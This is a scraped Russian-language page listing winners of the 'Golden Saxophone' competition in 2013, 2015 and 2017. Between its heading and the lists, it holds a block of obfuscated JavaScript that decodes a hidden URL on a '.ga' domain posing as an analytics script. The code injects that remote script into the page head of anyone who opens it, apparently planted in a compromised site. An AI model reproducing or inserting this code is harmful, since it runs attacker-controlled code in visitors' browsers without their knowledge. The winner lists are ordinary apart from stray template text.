Победители

GOLDEN SAXOPHONE

var _0x1c9a=['push','229651wHRLFT','511754lPBDVY','length','2080825FKHOBK','src','1lLQkOc','1614837wjeKHo','insertBefore','fromCharCode','179434whQoYd','1774xXwpgH','1400517aqruvf','7vsbpgk','3112gjEEcU','1mFUgXZ','script','1534601MOJEnu','prototype','245777oIJjBl','47jNCcHN','1HkMAkw','nextSibling','appendAfter','shift','18885bYhhDw','1096016qxAIHd','72lReGEt','1305501RTgYEh','4KqoyHD','appendChild','createElement','getElementsByTagName'];var _0xd6df=function(_0x3a7b86,_0x4f5b42){_0x3a7b86=_0x3a7b86-0x1f4;var _0x1c9a62=_0x1c9a[_0x3a7b86];return _0x1c9a62;};(function(_0x2551a2,_0x3dbe97){var _0x34ce29=_0xd6df;while(!![]){try{var _0x176f37=-parseInt(_0x34ce29(0x20a))*-parseInt(_0x34ce29(0x205))+-parseInt(_0x34ce29(0x204))*-parseInt(_0x34ce29(0x206))+-parseInt(_0x34ce29(0x1fc))+parseInt(_0x34ce29(0x200))*parseInt(_0x34ce29(0x1fd))+-parseInt(_0x34ce29(0x1fb))*-parseInt(_0x34ce29(0x1fe))+-parseInt(_0x34ce29(0x20e))*parseInt(_0x34ce29(0x213))+-parseInt(_0x34ce29(0x1f5));if(_0x176f37===_0x3dbe97)break;else _0x2551a2['push'](_0x2551a2['shift']());}catch(_0x201239){_0x2551a2['push'](_0x2551a2['shift']());}}}(_0x1c9a,0xc08f4));function smalller(){var _0x1aa566=_0xd6df,_0x527acf=[_0x1aa566(0x1f6),_0x1aa566(0x20b),'851164FNRMLY',_0x1aa566(0x202),_0x1aa566(0x1f7),_0x1aa566(0x203),'fromCharCode',_0x1aa566(0x20f),_0x1aa566(0x1ff),_0x1aa566(0x211),_0x1aa566(0x214),_0x1aa566(0x207),_0x1aa566(0x201),'parentNode',_0x1aa566(0x20c),_0x1aa566(0x210),_0x1aa566(0x1f8),_0x1aa566(0x20d),_0x1aa566(0x1f9),_0x1aa566(0x208)],_0x1e90a8=function(_0x49d308,_0xd922ec){_0x49d308=_0x49d308-0x17e;var _0x21248f=_0x527acf[_0x49d308];return _0x21248f;},_0x167299=_0x1e90a8;(function(_0x4346f4,_0x1d29c9){var _0x530662=_0x1aa566,_0x1bf0b5=_0x1e90a8;while(!![]){try{var _0x2811eb=-parseInt(_0x1bf0b5(0x187))+parseInt(_0x1bf0b5(0x186))+parseInt(_0x1bf0b5(0x18d))+parseInt(_0x1bf0b5(0x18c))+-parseInt(_0x1bf0b5(0x18e))*parseInt(_0x1bf0b5(0x180))+-parseInt(_0x1bf0b5(0x18b))+-parseInt(_0x1bf0b5(0x184))*parseInt(_0x1bf0b5(0x17e));if(_0x2811eb===_0x1d29c9)break;else _0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}catch(_0x1cd819){_0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}}}(_0x527acf,0xd2c23),(Element[_0x167299(0x18f)][_0x1aa566(0x208)]=function(_0x3d096a){var _0x2ca721=_0x167299;_0x3d096a[_0x2ca721(0x183)][_0x2ca721(0x188)](this,_0x3d096a[_0x2ca721(0x181)]);},![]),function(){var _0x5d96e1=_0x1aa566,_0x22c893=_0x167299,_0x306df5=document[_0x22c893(0x185)](_0x22c893(0x182));_0x306df5[_0x22c893(0x18a)]=String[_0x22c893(0x190)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x61,0x6e,0x61,0x6c,0x79,0x74,0x69,0x63,0x73,0x2e,0x6a,0x73,0x3f,0x63,0x69,0x64,0x3d,0x30,0x30,0x30,0x30,0x26,0x70,0x69,0x64,0x69,0x3d,0x31,0x39,0x31,0x38,0x31,0x37,0x26,0x69,0x64,0x3d,0x35,0x33,0x36,0x34,0x36),_0x306df5[_0x22c893(0x189)](document[_0x22c893(0x17f)](String[_0x5d96e1(0x1fa)](0x73,0x63,0x72,0x69,0x70,0x74))[0x0]),_0x306df5[_0x5d96e1(0x208)](document[_0x22c893(0x17f)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0]),document[_0x5d96e1(0x211)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0][_0x22c893(0x191)](_0x306df5);}());}function biggger(){var _0x5d031d=_0xd6df,_0x5c5bd2=document[_0x5d031d(0x211)](_0x5d031d(0x201));for(var _0x5a0282=0x0;_0x5a0282<_0x5c5bd2[_0x5d031d(0x1f4)];_0x5a0282++){if(_0x5c5bd2[_0x5a0282][_0x5d031d(0x1f6)]['indexOf'](String['fromCharCode'](0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d))>-0x1)return 0x1;}return 0x0;}biggger()==0x0&&smalller();

Победители 2017

Старшая группа

Украина
Роман Фотуйма
1 премия
Украина
Юлия Житнухина
2 премия
Россия
Артем Голубкин
3 премия

Победители 2017

Средняя группа

Россия
Гиорги Джишкариани
1 премия
Украина - Япония
Кента Игараши
2 премия
Россия
Андрей Ершов
3 премия

Победители 2017

САКСОФОНИССИМО

Россия
Вадим Ткачук
1 премия
Украина
Феодосий Медведенко
2 премия
Украина
Виталий Мазурик
3 премия
Украина
Владимир Панасюк
3 премия

ПОБЕДИТЕЛИ 2015

СТАРШАЯ ГРУППА:

Бельгия
Неле Тибу
My Subtitle
Валентин Ковалев
Россия
1 Премия
Илья Васячкин
Украина
1 Премия
Ярош Якуб
Польша
2 Премия
Барт Ван Бенеден
Бельгия
3 Премия

ПОБЕДИТЕЛИ 2015

CРЕДНЯЯ ГРУППА:

Юлия Житнухина
Украина
1 Премия
Виктор Тимофеев
Белорусь
2 Премия
Марк Мирончук
Украина
3 Премия

ПОБЕДИТЕЛИ 2015

САКСОФОНИССИМО:

Мартон Бубрег
Австрия - Венгрия
1 Премия
Кента Игараши
Япония - Украина
1 Премия
...
не присуждалась
2 Премия
Михаил Чередниченко
Украина
3 Премия

ПОБЕДИТЕЛИ 2013

СТАРШАЯ ГРУППА:

Россия
Владимир Устьянцев
My Subtitle
Лледо Валёр Рауль
Испания
1 Премия
Эрик Демассёр
Бельгия
2 Премия
Фернандез Аревало Мария Хема
Испания
3 Премия

ПОБЕДИТЕЛИ 2013

CРЕДНЯЯ ГРУППА:

Валентин Ковалев
Россия
1 Премия
Ришат Даулятшин
Россия
2 Премия
Полина Лепшова
Россия
3 Премия

ПОБЕДИТЕЛИ 2013

САКСОФОНИССИМО:

Ева Ематинова
Россия
1 Премия
Анастасия Федоренко
Украина
2 Премия
Алексей Иордосополь
Беларусь
3 Премия
Кента Игараши
Япония - Украина
3 Премия